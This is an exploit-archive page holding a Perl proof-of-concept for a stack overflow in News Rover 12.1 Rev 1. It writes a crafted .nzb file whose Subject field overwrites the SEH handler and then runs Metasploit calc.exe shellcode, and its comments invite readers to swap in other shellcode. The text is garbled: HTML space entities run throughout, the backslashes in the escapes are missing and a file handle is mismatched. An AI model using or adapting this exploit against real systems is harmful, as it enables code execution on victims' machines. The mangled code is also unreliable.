News Rover 12.1 Rev 1 Remote Stack Overflow Exploit (perl)

#!/usr/bin/perl #&nbsp;=============================================================================================== #&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;News&nbsp;Rover&nbsp;12.1&nbsp;Rev&nbsp;1&nbsp;Remote&nbsp;Stack&nbsp;Overflow&nbsp;perl&nbsp;exploit&nbsp; #&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;By&nbsp;Umesh&nbsp;Wanve&nbsp;(umesh_345@yahoo.com) #&nbsp;==============================================================================================&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #&nbsp;Credits&nbsp;:&nbsp;Originally&nbsp;discovered&nbsp;and&nbsp;coded&nbsp;in&nbsp;c&nbsp;by&nbsp;Marsu&nbsp;<MarsupilamiPowa@hotmail.fr> # #&nbsp;Reference&nbsp;:&nbsp;http://www.securityfocus.com/bid/22618 # #&nbsp;Date&nbsp;:&nbsp;24-02-2007 # #&nbsp;This&nbsp;is&nbsp;converted&nbsp;into&nbsp;perl&nbsp;for&nbsp;perl&nbsp;lovers. #&nbsp;Tested&nbsp;on&nbsp;Windows&nbsp;2000&nbsp;SP4&nbsp;Server&nbsp;English #&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Windows&nbsp;2000&nbsp;SP4&nbsp;Professional&nbsp;English # #&nbsp;You&nbsp;can&nbsp;replace&nbsp;shellcode&nbsp;with&nbsp;your&nbsp;favourite&nbsp;one&nbsp;:) # #&nbsp; #&nbsp;Buffer&nbsp;overflow&nbsp;exists&nbsp;in&nbsp;Subject&nbsp;parameter&nbsp;of&nbsp;the&nbsp;.nzb&nbsp;file #&nbsp;By&nbsp;Passing&nbsp;more&nbsp;than&nbsp;2022&nbsp;bytes&nbsp;we&nbsp;can&nbsp;able&nbsp;to&nbsp;overwrite&nbsp;SEH&nbsp;handler #&nbsp;So&nbsp;here&nbsp;you&nbsp;go. #&nbsp;Buffer&nbsp;=&nbsp;&nbsp;&nbsp;&nbsp;Buffer&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;+&nbsp;&nbsp;Short&nbsp;Jmp&nbsp;to&nbsp;Hellcode&nbsp;(Pointer&nbsp;to&nbsp;NEXT&nbsp;SEH&nbsp;Handler)&nbsp;+&nbsp;SEH&nbsp;HANDLER&nbsp;+&nbsp;&nbsp;NOP&nbsp;SLED&nbsp;+&nbsp;Shellcode #&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<-2022&nbsp;Bytes&nbsp;->&nbsp;&nbsp;&nbsp;<---------------4&nbsp;Byte------------------------------->&nbsp;&nbsp;&nbsp;<&nbsp;4&nbsp;Byte&nbsp;>&nbsp;&nbsp;&nbsp;+&nbsp;<-15&nbsp;bytes-> # #&nbsp;USE&nbsp;0x750211a9&nbsp;Universal&nbsp;address&nbsp;found&nbsp;on&nbsp;Metasploit.&nbsp;Thanks&nbsp;to&nbsp;them #&nbsp;Just&nbsp;change&nbsp;to&nbsp;anything&nbsp;you&nbsp;want. # #&nbsp;This&nbsp;was&nbsp;written&nbsp;as&nbsp;a&nbsp;fun.&nbsp;Use&nbsp;it&nbsp;at&nbsp;your&nbsp;own&nbsp;risk. # #&nbsp;Special&nbsp;thanks&nbsp;to&nbsp;Marsu&nbsp;(bug&nbsp;discover&nbsp;and&nbsp;exploit&nbsp;coded&nbsp;in&nbsp;c&nbsp;by&nbsp;him).&nbsp;:) #&nbsp;Also&nbsp;thanks&nbsp;to&nbsp;Metasploit&nbsp;for&nbsp;there&nbsp;great&nbsp;Opcode&nbsp;database. # #================================================================================================ use&nbsp;strict; my($buffer)=(\"A\"&nbsp;x&nbsp;2022);&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#buffer&nbsp;upto&nbsp;SEH&nbsp;structure my($Short_jmp)=\"xebx15x90x90\";&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#short&nbsp;jmp&nbsp;to&nbsp;hellcode my($SEH_handler)=\"xa9x11x02x75\";&nbsp;&nbsp;#pop,&nbsp;pop,&nbsp;ret&nbsp;in&nbsp;WS2HELP.DLL&nbsp;in&nbsp;WIN&nbsp;2000&nbsp;SP4&nbsp; &nbsp;&nbsp;#&nbsp;Universal&nbsp;Address&nbsp;:) &nbsp;&nbsp;#Change&nbsp;according&nbsp;to&nbsp;your&nbsp;need my($nop)=\"x90x90x90x90x90\". &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"x90x90x90x90x90\". &nbsp;&nbsp;&nbsp;\"x90x90x90x90x90\";&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#NOP&nbsp;sled&nbsp;to&nbsp;land&nbsp;into&nbsp;hellcode #&nbsp;win32_exec&nbsp;-&nbsp;EXITFUNC=seh&nbsp;CMD=calc.exe&nbsp;Size=164&nbsp;Encoder=PexFnstenvSub&nbsp;http://metasploit.com&nbsp; my($hell_calc)= \"x2bxc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xa4\". \"xb2x82x70x83xebxfcxe2xf4x58x5axc6x70xa4xb2x09x35\". \"x98x39xfex75xdcxb3x6dxfbxebxaax09x2fx84xb3x69x39\". \"x2fx86x09x71x4ax83x42xe9x08x36x42x04xa3x73x48x7d\". \"xa5x70x69x84x9fxe6xa6x74xd1x57x09x2fx80xb3x69x16\". \"x2fxbexc9xfbxfbxaex83x9bx2fxaex09x71x4fx3bxdex54\". \"xa0x71xb3xb0xc0x39xc2x40x21x72xfax7cx2fxf2x8exfb\". \"xd4xaex2fxfbxccxbax69x79x2fx32x32x70xa4xb2x09x18\". \"x98xedxb3x86xc4xe4x0bx88x27x72xf9x20xccx42x08x74\". \"xfbxdax1ax8ex2exbcxd5x8fx43xd1xe3x1cxc7x9cxe7x08\". \"xc1xb2x82x70\"; my($file_header)=\"<?xml&nbsp;version=\"1.0\"&nbsp;encoding=\"iso-8859-1\"&nbsp;?> \". \"<!DOCTYPE&nbsp;nzb&nbsp;PUBLIC&nbsp;\"-//newzBin//DTD&nbsp;NZB&nbsp;1.0//EN\"&nbsp;\"http://www.newzbin.com/DTD/nzb/nzb-1.0.dtd\"> \". \"<!--&nbsp;NZB&nbsp;Generated&nbsp;by&nbsp;Umesh&nbsp;Wanve&nbsp;--> \". \"<nzb&nbsp;xmlns=\"http://www.google.com\"> \"; my($file_end)=\"</segment> \". \"</segments> \". \"</file> \". \"</nzb> \"; open(OUTPUTFILE,&nbsp;\">poc.nzb\");&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;Crafted&nbsp;.NZB&nbsp;file&nbsp; &nbsp; print&nbsp;OUTPUTFILE&nbsp;$file_header;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;Writing&nbsp;Header print&nbsp;OUTPUTFILE&nbsp;\"<file&nbsp;poster=\"Poster\"&nbsp;date=\"1170609233\" subject=\"\";&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;Vulnerable&nbsp;SUBJECT&nbsp;parameter print&nbsp;OUTPUTFILE&nbsp;$buffer;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;buffer&nbsp;=A&nbsp;x&nbsp;2022 print&nbsp;OUTPUTFILE&nbsp;$Short_jmp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#short&nbsp;jump&nbsp;xEBx15x90x90 print&nbsp;OUTPUTFILE&nbsp;$SEH_handler;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#pop&nbsp;pop&nbsp;ret&nbsp;in&nbsp;&nbsp;&nbsp;&nbsp;WS2HELP.DLL&nbsp;in&nbsp;WIN&nbsp;2000&nbsp;SP4 print&nbsp;OUTPUTFILE&nbsp;$nop;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#nop&nbsp;sled&nbsp;to&nbsp;jump&nbsp;into&nbsp;shellcode print&nbsp;OUTPUTFILE&nbsp;$hell_calc;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#the&nbsp;hell&nbsp;code print&nbsp;OUTPUTFILE&nbsp;\"\"> <groups><group>some&nbsp;group</group></groups> <segments> <segment&nbsp;bytes=\"30\"&nbsp;number=\"1\">some&nbsp;name\"; print&nbsp;OUTPUTFILE&nbsp;$file_end;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;End&nbsp;of&nbsp;file close(OUTFILE); #&nbsp;========================================== &nbsp;